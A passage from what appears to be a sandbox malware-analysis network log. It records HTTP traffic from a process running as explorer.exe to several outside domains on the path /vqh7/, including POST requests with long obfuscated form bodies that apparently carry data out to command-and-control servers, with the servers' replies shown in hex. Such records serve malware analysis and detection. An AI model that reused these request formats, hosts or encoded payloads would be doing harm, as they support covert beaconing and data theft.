nS8x2j4tEY-jDDEDk9SjmxA8zDWSxCRGUTHwW92to~mwoBnkyM64QW9STUZF8f8fHJKBMoKLc~Qne~hb9YPmns2n3(ZSAzbPaD7e_r5Q5T6cB2RgXzE3NVi4RFB0wGVd3XoIcfeNAuOynf4NVszf_3KKZQ2QcAMFtjvt4Udu54w(tVysT3geg6_noZlwA(_eGe0jmyS2Qp_drGE5KlJKR6jurbtRb3Vb-qeeym49iykhQTZTq2ibEl0QeGCSueKB64hgI02AkySU5cGFQgngh1G5HqHAIH83Ex6W7uJbkov1TOPRU1EgwNP8uzcln~hrU3OY75gO0iGfpqOt2cSwM4EAWHuPvPkLEDlvNYyqv4vipGz0CpjLd~9UFsV962yCHKL47X4ZKDwWPLh1E3dyo4aYWNYnekMuH2-d_p6wB5faNKWDSNwuaTnduzzH8pGrkgCiY3VkAa1K6kWEY5ikt8e(ZzVxEA18I6cC
                                                              Feb 10, 2023 12:45:36.057223082 CET201INHTTP/1.1 404 Not Found
                                                              Date: Fri, 10 Feb 2023 11:45:36 GMT
                                                              Server: Apache/2.4.54 (Unix)
                                                              Content-Length: 196
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              12192.168.2.34969581.169.145.7280C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 10, 2023 12:45:38.585104942 CET202OUTGET /vqh7/?u1ua=6yP+4zmmFGehQ93JjA+P25coRCWIpu4kk0hKva5GiC1xzxOLQ03YJLnHpsQLSqMsYpfBQcl74Zo/h4S4tn0LYNfYE0qlHbGzJw==&4sHXq=qmMaHdA-N1MF HTTP/1.1
                                                              Host: www.frogair.online
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Feb 10, 2023 12:45:38.607533932 CET202INHTTP/1.1 404 Not Found
                                                              Date: Fri, 10 Feb 2023 11:45:38 GMT
                                                              Server: Apache/2.4.54 (Unix)
                                                              Content-Length: 196
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              13192.168.2.34969681.169.145.15880C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 10, 2023 12:45:43.656374931 CET203OUTPOST /vqh7/ HTTP/1.1
                                                              Host: www.krankenzusatz.net
                                                              Connection: close
                                                              Content-Length: 186
                                                              Cache-Control: no-cache
                                                              Origin: http://www.krankenzusatz.net
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Accept: */*
                                                              Referer: http://www.krankenzusatz.net/vqh7/
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate
                                                              Data Raw: 75 31 75 61 3d 28 31 64 68 6f 76 37 6f 4f 61 35 49 68 2d 56 6b 36 30 34 79 78 6d 33 4c 38 37 31 55 78 5a 63 67 5a 66 55 59 56 68 67 6b 64 37 34 52 49 4b 30 6d 56 66 51 36 72 6d 54 66 52 5a 4b 54 28 33 78 30 4c 4b 50 33 7a 32 30 51 52 6b 43 71 38 4a 6c 61 6e 72 48 55 35 6c 66 78 5a 69 53 30 4e 74 4b 54 72 53 48 68 47 42 77 35 56 68 68 5f 31 45 49 52 6a 4e 49 78 57 74 76 53 42 44 6e 36 6e 72 38 46 65 38 6a 5a 54 75 61 50 59 4e 79 79 6a 36 38 4f 4d 44 64 5a 35 32 73 74 38 70 50 65 49 36 75 52 45 47 43 58 7e 78 7e 47 45 6c 6c 4f 4c 67 70 6d 56 77 29 2e 00 00 00 00 00 00 00 00
                                                              Data Ascii: u1ua=(1dhov7oOa5Ih-Vk604yxm3L871UxZcgZfUYVhgkd74RIK0mVfQ6rmTfRZKT(3x0LKP3z20QRkCq8JlanrHU5lfxZiS0NtKTrSHhGBw5Vhh_1EIRjNIxWtvSBDn6nr8Fe8jZTuaPYNyyj68OMDdZ52st8pPeI6uREGCX~x~GEllOLgpmVw).
                                                              Feb 10, 2023 12:45:43.676640987 CET204INHTTP/1.1 301 Moved Permanently
                                                              Date: Fri, 10 Feb 2023 11:45:43 GMT
                                                              Server: Apache/2.4.54 (Unix)
                                                              Location: https://www.krankenzusatz.net/vqh7/
                                                              Content-Length: 243
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 61 6e 6b 65 6e 7a 75 73 61 74 7a 2e 6e 65 74 2f 76 71 68 37 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.krankenzusatz.net/vqh7/">here</a>.</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              14192.168.2.34969781.169.145.15880C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 10, 2023 12:45:46.193809032 CET210OUTPOST /vqh7/ HTTP/1.1
                                                              Host: www.krankenzusatz.net
                                                              Connection: close
                                                              Content-Length: 5334
                                                              Cache-Control: no-cache
                                                              Origin: http://www.krankenzusatz.net
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Accept: */*
                                                              Referer: http://www.krankenzusatz.net/vqh7/
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate
                                                              Data Raw: 75 31 75 61 3d 28 31 64 68 6f 76 37 6f 4f 61 35 49 69 65 6c 6b 34 54 73 79 33 47 33 4d 67 72 31 55 34 35 64 70 5a 66 51 59 56 6c 35 70 64 49 55 52 4a 5a 4d 6d 62 61 38 36 70 6d 54 66 58 5a 4b 66 38 48 78 69 4c 4b 4c 37 7a 32 6b 41 52 6d 4f 71 38 63 70 61 6a 4c 48 4c 6d 31 66 79 61 69 53 33 4a 74 4b 54 72 53 43 4b 47 41 77 44 56 68 35 5f 31 32 41 52 6a 49 6b 32 57 39 76 66 44 44 6e 36 6e 72 67 77 65 38 6a 76 54 75 53 66 59 4f 36 79 6a 70 6b 4f 41 79 64 65 7e 6d 73 6d 31 4a 4f 4f 47 62 58 57 50 48 36 47 34 79 54 39 44 31 31 51 50 55 30 7a 43 30 55 41 6e 4d 76 47 79 31 7e 47 6a 52 6d 74 4f 57 41 2d 6d 55 58 37 69 73 63 6d 52 74 61 74 46 75 35 35 38 7a 38 58 4f 67 6a 56 6d 64 34 66 67 69 57 5a 4f 66 4e 6e 79 2d 45 66 56 50 6e 64 46 75 32 7a 68 6f 51 74 70 6d 6f 42 41 36 35 42 36 58 62 39 64 77 4a 42 68 31 54 4a 63 49 37 79 45 57 51 34 28 34 6b 73 36 4b 74 39 59 68 4e 65 75 35 57 53 74 46 67 31 64 5f 47 41 56 4b 6d 31 6e 56 73 63 36 4c 30 47 67 4a 76 37 73 79 33 47 6e 63 50 2d 62 55 39 36 66 6d 53 67 57 66 48 30 69 46 45 70 6b 4e 72 4a 34 75 58 39 63 59 71 49 73 53 59 65 6a 65 41 30 52 79 48 41 43 61 7a 41 34 72 4e 34 45 6c 71 33 5a 4b 69 54 66 6e 6d 50 43 43 4a 58 62 37 74 49 67 62 32 51 54 69 5a 7a 41 48 78 68 4d 6c 7a 4e 30 4a 49 75 56 33 78 37 47 67 52 63 59 54 6b 75 75 39 76 53 52 43 44 72 59 59 74 42 31 47 68 55 4e 34 38 64 34 50 28 57 7e 74 46 62 4d 5a 54 58 31 32 39 79 45 64 57 72 43 47 66 37 64 53 44 45 7e 70 48 6e 34 4a 55 70 4d 34 54 64 76 4e 38 72 6b 57 47 39 6a 50 67 70 6f 7a 6b 5a 59 6f 59 36 55 5f 58 66 69 36 44 61 62 66 35 63 79 6d 68 54 66 58 6e 32 78 52 35 30 48 4a 4b 38 6f 56 6b 6c 44 6e 43 4f 36 45 37 36 4f 7a 53 4f 47 41 37 71 39 74 57 75 4a 4c 49 45 34 74 35 57 7a 37 6d 67 45 70 58 4c 43 76 72 75 6f 49 67 79 39 6d 52 69 78 72 4d 48 79 6a 62 34 71 6b 46 53 63 45 61 33 4e 6f 46 34 6a 52 35 45 52 6d 4c 48 4a 61 57 5a 7e 56 33 58 32 45 57 44 74 64 31 4f 63 66 56 41 30 72 4d 43 70 72 64 57 6f 4e 79 56 44 35 51 31 78 76 4c 73 4e 31 45 32 76 41 75 77 34 6f 4e 2d 45 6a 79 4c 68 63 59 6d 4e 49 55 61 57 54 51 4c 69 77 45 48 67 67 73 33 31 6d 39 56 67 4d 31 74 55 51 64 38 6c 73 69 53 64 6a 44 65 78 78 63 46 6c 42 49 62 45 76 75 41 47 7a 56 74 37 47 4f 51 55 46 67 51 77 75 4e 71 58 6e 4d 55 28 39 78 46 51 38 63 48 64 44 37 31 4e 30 4c 49 54 43 65 6c 73 52 4c 30 7a 64 66 4d 47 6c 45 48 4c 45 4f 76 66 30 56 4b 47 36 39 57 4d 6e 6c 54 51 38 48 6a 54 56 37 42 7e 71 53 66 52 78 4b 6e 68 54 76 59 4d 6a 37 6c 42 6e 68 5f 6a 51 64 47 65 59 61 4d 62 75 69 46 34 6b 75 58 69 79 38 72 70 59 41 61 43 52 51 75 75 31 56 32 76 64 64 7a 71 6a 54 5f 37 69 4c 6f 71 37 77 5a 36 64 4d 62 57 47 43 59 7a 33 38 52 48 4d 6f 72 47 4c 66 4d 43 42 48 48 6a 46 34 4d 48 48 45 78 57 48 4e 7a 68 4a 47 34 47 78 28 37 30 39 35 5a 50 55 45 4c 79 76 42 61 64 5a 5a 61 71 2d 4b 78 5a 37 64 4f 51 67 4f 49 72 50 63 36 65 64 65 74 54 48 34 46 4e 4c 6d 64 69 61 45 76 55 6e 39 74 6d 77 4a 53 67 35 5a 4f 55 79 4e 38 51 46 6a 52 70 36 4c 76 69 2d 4f 31 47 38 35 38 72 7a 6f 70 4a 56 67 5f 43 65 77 65 69 43 4a 59 76 75 63 62 41 54 69 6e 37 56 39 6f 34 37 72 36 6a 4f 48 6b 69 58 65 38 41 42 4e 49 68 58 41 64 44 66 33 32 4d 48 54 6d 30 68 64 33 57 6c 67 73 69 61 36 54 7e 38 76 66 72 6c 43 31 76 5a 47 57 6b 37 59 72 39 47 7e 52 39 69 76 64 41 71 4b 4d 4d 59 41 31 52 46 28 39 66 59 78 2d 73 5a 50 44 59 33 5a 6c 54 37 59 73 32 55 78 37 70 4e 56 45 44 62 6a 6d 50 6c 43 67 77 36 69 71 70 33 74 46 32 4e 52 38 59 44 79 79 39 77 46 6b 38 78 57 67 44 36 67 79 4b 63 6f 48 62 46 47 61 49 67 68 36 61 5a 34 4f 74 58 4b 38 69 4f 36 4a 30 71 6c 56 76 49 43 34 63 56 46 35 56 51 44 43 56 44 7a 51 6b 54 34 63 37 32 44 50 42 6b 59 57 30 59 52 6a 52 76 73 5f 75 62 32 2d 6b 73 61 6c 37 79 52 43 77 41 59 45 6a 61 77 6c 61 59 6d 4c 75 32 59 4d 73 32 4a 59 6f 58 68 72 58 43 71 6e 49 57 42 39 68 53 6d 65 73 48 73 42 56 41 41 78 52 4a 6b 36 70 55 51 5f 4d 33 7a 30 48 58 67 56 39 36 36 37 67 33 48 2d 30 71 64 30 50 47 6d 6a 77 45 55 59 6a 63 54 7a 59 49 31 30 77 33 6f 41 39 42 65 52 77 53 41 53 7a 57 41 31 6b 71 6e 42 77 5f 28 76 34 47 63 37 6e 4f 62 6b 53 75 48 46 4a 38 53 64 33 49
                                                              Data Ascii: u1ua=(1dhov7oOa5Iielk4Tsy3G3Mgr1U45dpZfQYVl5pdIURJZMmba86pmTfXZKf8HxiLKL7z2kARmOq8cpajLHLm1fyaiS3JtKTrSCKGAwDVh5_12ARjIk2W9vfDDn6nrgwe8jvTuSfYO6yjpkOAyde~msm1JOOGbXWPH6G4yT9D11QPU0zC0UAnMvGy1~GjRmtOWA-mUX7iscmRtatFu558z8XOgjVmd4fgiWZOfNny-EfVPndFu2zhoQtpmoBA65B6Xb9dwJBh1TJcI7yEWQ4(4ks6Kt9YhNeu5WStFg1d_GAVKm1nVsc6L0GgJv7sy3GncP-bU96fmSgWfH0iFEpkNrJ4uX9cYqIsSYejeA0RyHACazA4rN4Elq3ZKiTfnmPCCJXb7tIgb2QTiZzAHxhMlzN0JIuV3x7GgRcYTkuu9vSRCDrYYtB1GhUN48d4P(W~tFbMZTX129yEdWrCGf7dSDE~pHn4JUpM4TdvN8rkWG9jPgpozkZYoY6U_Xfi6Dabf5cymhTfXn2xR50HJK8oVklDnCO6E76OzSOGA7q9tWuJLIE4t5Wz7mgEpXLCvruoIgy9mRixrMHyjb4qkFScEa3NoF4jR5ERmLHJaWZ~V3X2EWDtd1OcfVA0rMCprdWoNyVD5Q1xvLsN1E2vAuw4oN-EjyLhcYmNIUaWTQLiwEHggs31m9VgM1tUQd8lsiSdjDexxcFlBIbEvuAGzVt7GOQUFgQwuNqXnMU(9xFQ8cHdD71N0LITCelsRL0zdfMGlEHLEOvf0VKG69WMnlTQ8HjTV7B~qSfRxKnhTvYMj7lBnh_jQdGeYaMbuiF4kuXiy8rpYAaCRQuu1V2vddzqjT_7iLoq7wZ6dMbWGCYz38RHMorGLfMCBHHjF4MHHExWHNzhJG4Gx(7095ZPUELyvBadZZaq-KxZ7dOQgOIrPc6edetTH4FNLmdiaEvUn9tmwJSg5ZOUyN8QFjRp6Lvi-O1G858rzopJVg_CeweiCJYvucbATin7V9o47r6jOHkiXe8ABNIhXAdDf32MHTm0hd3Wlgsia6T~8vfrlC1vZGWk7Yr9G~R9ivdAqKMMYA1RF(9fYx-sZPDY3ZlT7Ys2Ux7pNVEDbjmPlCgw6iqp3tF2NR8YDyy9wFk8xWgD6gyKcoHbFGaIgh6aZ4OtXK8iO6J0qlVvIC4cVF5VQDCVDzQkT4c72DPBkYW0YRjRvs_ub2-ksal7yRCwAYEjawlaYmLu2YMs2JYoXhrXCqnIWB9hSmesHsBVAAxRJk6pUQ_M3z0HXgV9667g3H-0qd0PGmjwEUYjcTzYI10w3oA9BeRwSASzWA1kqnBw_(v4Gc7nObkSuHFJ8Sd3I~creo3VQrP2fsEGiF3McNJa4p2WOLeQTd9YpipjuVevXTv12tr0_XsTPgDyfSzrx9TtQX7qhrH6XzRz7Tm8bbifJWYe_qopQGV92sS(7D0aFsGpdrJHorpAm7t~M7oxuCHFIu0q0CJl1HxYTZ95ZKeCOQwfE(7PtFsKq9nGGmNabYb~td42QruOllk2Ul30xkamT804EjGp7EqyufXEVyvyLZjODkMNakky7jKxeY6qPinLud7YvJI7DoG~MwfvbRPgjK8nlippVPAb1lP~zYFYcSYYFzbQm4hw_UM17wAzWis88JCE1h8UqLhqQoBOWDYIF7xBRxRVQkjom8eKmbBlzc09bVoQaxc4fTWYMjQzFQu1IQEXGdWhcUIGr8GsFYlnlzNvCNwhxCNajFD(ow2mSWhJPU0YMBS2Q14X3NzWq2FZSui8dfh3NnNWJVXB-Gi8KUTnvUmfQOGN7LbWTypvHu34CbBtHQT(YYMeXeuCcxgI_ZyMjPQdlywV21JeSJ5wQKwzfKsrkDnB7aAeZvjxOlIKEP6~jz2~4hSfUyRRMvU1ELJMQ~-u4oG5vnDucCLIsn9oxDwBg6TTxVNF2q40XwLUksdxX1XDe2CrPGpm-K2sEzrGVkI(Nz6CUNhOYAY~EoeO3XrnIDxCU07Uy971IzHPRzG3sl1j0amZxTn(PWCjE~0BU2amT(nBTEguGmbJzyfoxWX5EmGHQzbzfYKrq56~sPtd904~u4xjblvWdiynSOK(_K8R3axNTFbF3EmvjsQ7rgdSkxCnZ8QejAT2E6zXz8Zw_ZBLjEKnoBbUOQUfTd9WmFJjL4IpH60VV1s6RQo(OvCsLoq6_726wNO2xEkCFaFzGJmvy(Kh-d2nyWhKaAXCkrt6OMB4FswMfzcXXjKpGk8s1v6fyBnca(GyrBtHvu6qQl1p2IzKquHfyTvqetMAsBavw~peUSiGjgsclHq6X0ov7EcWceOYrj1VkOkg9Lzl4tv(BdIKK~xY_ORnLs9dMrvDuBpNJON5QekxHAm4fG2j-WkWgjSgOP0vEEFVIByMr1xkXtKgfqOrd90cDpb55tsg4T4gD33GjlOTlnrgLjf7Utzsp77t2oY~uFBrfdxO-cEUnJyekv40xjrEIvJLuJibGoDVupXikAXurZnef9NwXDgtKQ4zoVhoHiN5v45fff-CAlbdOamt5hlA8PC97U43Wmhqin8iF9Z0oWyPCHpxLhHWpMmBfruQ8SBGV4ADpBIVpN0rf(s1tKAkr(1Df3XNDGX3eae9qQrYINs0NfskCopj3KaLl4iN2B7vODcbPweqqL7OxsHLhnNu8nSHO7M~RAlaMcBKmm3me~7LFAwsQN1APe1RzfrY11itZhoMNAOtqmFSJho5wx3vy91jz2gLZgh9NMTJvp6YW(Ol2PMWlteMUHhB4huaYni2eyEn3QNuHN69-Z5FT(ms62umCuNPgFR(eQ5fJXTKIMekLhOrq63MFtj9dqQvPkSGwGjea(9BOBEOYwrnvE57ZoOvWCqtoiGxQikOzHjoQpl95JPpPGMEx3NOkqMN6QyEXCz0FVExv7JmIRlOAPWMfwpHILS8g2TqjT3duGm7SP5XGvoZmhsd5HMSOqwt9V2lxtMAwSPlPetRug-3JWaE34yqtQ5yjqT4Lw20vl5tGxi2sxCzumNx1OZJglDBRU5z3hFA9NyqL7AepzKqw2YWvoYUNwUai3PAA7RlxFJRyRkVHdbW9KbGMY2vpFvfmA0nxdbbjPAVrYWhDp-wGH7sCbIiLQockabdjSROjKSQ6o6ksCoqziwhsRD2s7K6uZe(F6sjeHYQlFTHoUTo_9DOluDnADXgTFeAJQKTrhPRAWZSkREHAMMEzvDVTU8ZZg1KvKIweKwY7ID31Dsmj4ZNVAD(uxMSBAPoQT7q10TG7JHXEhBi78Yt4v_~A2ZRDZc8z7PAyJdBWEydx~4xxFhAkwt3j9S9LF7g24VqrjoOrlZWILdUazyWr5N2wa18uck5kl_mKMRwLaZeTD11jiqylxif6mg0A(QufP77hxtKhO1M_6eYFMaa7i8IgSMnn68xz8zIQekt2(hKfG_E9CNfUjI4idxD37C1113L-7Dcj25~spPr-jVqCBkf9iCmwAd~nkVT-aV7XWWRxIXqPVWMX4yv6uaSrcj40pJ8NVTtFNpqazyO8CQmnSyZw2MsDqGYwpWYVkjlNICZVM3WsiRvNPcP85MRgdH0QZMP-l_FWBwPRfxpmddPw2PR3HtKl~eVML1IeuVhPs-axG2WmTglhHwp122LCO8qo06kXOWRl7JDpzCYijDLRe0y6D_2pFFlxaReYh7rDZTXlYZtYuLq9HhTyvZiaxeYytoQCgBGrfvXsNEef~qpbRs6xpuQNgCdgwDkjdpFBEVkfcHv-2cmVDt9GvNOTOokxyI4GK3ihpajaWOEBlci4L8z2mPG-Z08L3mPRuqXPcGsJo_6lvpaR~a1n9Yp6GaVJPXIyZVqx3Dd5qxlV~bz6zD70~tCEa4PLbwCgoFY0jKi9ua0R4W3USdkevhQmaowt8Y8i6_Nd(RIu2dmBZKJVhsgxHKVBlpoRifrlQ5CWRmb_ywGjJXCcZ8jow4SdpdRI0rFXuvNMbnn6ltDv21xFKcPVhGvShR~JRc8nDWJ40x4YRsDMjMCqYYhcPB6F~sf-BCvDmrElEAkBCHhLrGUYEFEUetnq9ebLMIHMi4w
                                                              Feb 10, 2023 12:45:46.214030027 CET210INHTTP/1.1 301 Moved Permanently
                                                              Date: Fri, 10 Feb 2023 11:45:46 GMT
                                                              Server: Apache/2.4.54 (Unix)
                                                              Location: https://www.krankenzusatz.net/vqh7/
                                                              Content-Length: 243
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 61 6e 6b 65 6e 7a 75 73 61 74 7a 2e 6e 65 74 2f 76 71 68 37 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.krankenzusatz.net/vqh7/">here</a>.</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              15192.168.2.34969881.169.145.15880C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 10, 2023 12:45:48.746792078 CET211OUTGET /vqh7/?u1ua=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of6ew4EgbD4Si63saT16r7LNb7qf0+U/tSn+rF9O8jw==&4sHXq=qmMaHdA-N1MF HTTP/1.1
                                                              Host: www.krankenzusatz.net
                                                              Connection: close
                                                              Data Raw: 00 00 00 00 00 00 00
                                                              Data Ascii:
                                                              Feb 10, 2023 12:45:48.767123938 CET212INHTTP/1.1 301 Moved Permanently
                                                              Date: Fri, 10 Feb 2023 11:45:48 GMT
                                                              Server: Apache/2.4.54 (Unix)
                                                              Location: https://www.krankenzusatz.net/vqh7/?u1ua=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of6ew4EgbD4Si63saT16r7LNb7qf0+U/tSn+rF9O8jw==&4sHXq=qmMaHdA-N1MF
                                                              Content-Length: 372
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 61 6e 6b 65 6e 7a 75 73 61 74 7a 2e 6e 65 74 2f 76 71 68 37 2f 3f 75 31 75 61 3d 79 33 31 42 72 61 6a 45 45 72 70 31 78 39 42 64 37 47 34 44 79 33 6e 79 70 62 49 55 39 70 74 69 50 34 4a 37 42 56 6b 79 58 4e 77 6e 58 35 39 32 65 5a 5a 76 74 6c 2f 4f 66 36 65 77 34 45 67 62 44 34 53 69 36 33 73 61 54 31 36 72 37 4c 4e 62 37 71 66 30 2b 55 2f 74 53 6e 2b 72 46 39 4f 38 6a 77 3d 3d 26 61 6d 70 3b 34 73 48 58 71 3d 71 6d 4d 61 48 64 41 2d 4e 31 4d 46 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.krankenzusatz.net/vqh7/?u1ua=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of6ew4EgbD4Si63saT16r7LNb7qf0+U/tSn+rF9O8jw==&amp;4sHXq=qmMaHdA-N1MF">here</a>.</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              16192.168.2.34969975.102.22.16880C:\Windows\explorer.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 10, 2023 12:45:54.380230904 CET213OUTPOST /vqh7/ HTTP/1.1
                                                              Host: www.hotelyeah.top
                                                              Connection: close
                                                              Content-Length: 186
                                                              Cache-Control: no-cache
                                                              Origin: http://www.hotelyeah.top
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Accept: */*
                                                              Referer: http://www.hotelyeah.top/vqh7/
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate
                                                              Data Raw: 75 31 75 61 3d 32 42 55 66 6d 31 58 61 34 2d 59 50 49 71 34 55 6b 6f 76 35 39 6e 37 6d 66 70 46 44 76 36 73 68 48 51 6c 6a 74 50 48 68 45 30 56 39 32 73 67 36 38 70 4b 41 55 54 53 68 68 71 63 4a 72 49 39 35 7a 7a 6e 71 70 48 6a 41 74 4d 39 7a 39 72 4c 35 31 57 68 43 61 43 44 55 4f 4b 66 75 4f 4c 79 4d 58 66 47 78 6b 4c 6f 6d 44 69 28 44 55 4f 45 5a 53 76 68 6d 74 30 7e 76 6c 4f 65 67 28 78 35 77 74 31 4a 61 54 78 7e 4f 59 62 45 50 4f 62 7a 6d 78 66 42 64 64 5a 72 37 59 68 41 52 4f 4a 7a 69 32 70 30 4c 4e 5a 35 71 4c 69 73 37 72 59 75 54 52 51 29 2e 00 00 00 00 00 00 00 00
